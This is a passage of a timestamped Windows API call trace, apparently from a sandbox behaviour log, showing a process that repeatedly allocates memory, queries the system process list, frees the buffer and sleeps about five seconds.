ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.135] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.150] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 